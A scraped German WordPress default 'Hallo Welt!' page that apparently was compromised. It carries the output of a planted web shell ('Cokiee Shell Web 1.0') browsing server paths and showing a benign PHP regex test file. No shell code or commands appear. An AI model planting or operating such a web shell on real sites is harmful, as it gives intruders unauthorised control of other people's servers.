Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/pcre/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/pcre/tests/dollar_endonly.phpt |
--TEST-- D (PCRE_DOLLAR_ENDONLY) modififer --FILE-- <?php var_dump(preg_match_all('/^\S+.+$/', "aeiou\n", $m)); var_dump($m); var_dump(preg_match_all('/^\S+.+$/D', "aeiou\n", $m)); var_dump($m); var_dump(preg_match_all('/^\S+\s$/D', "aeiou\n", $m)); var_dump($m); ?> --EXPECT-- int(1) array(1) { [0]=> array(1) { [0]=> string(5) "aeiou" } } int(0) array(1) { [0]=> array(0) { } } int(1) array(1) { [0]=> array(1) { [0]=> string(6) "aeiou " } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare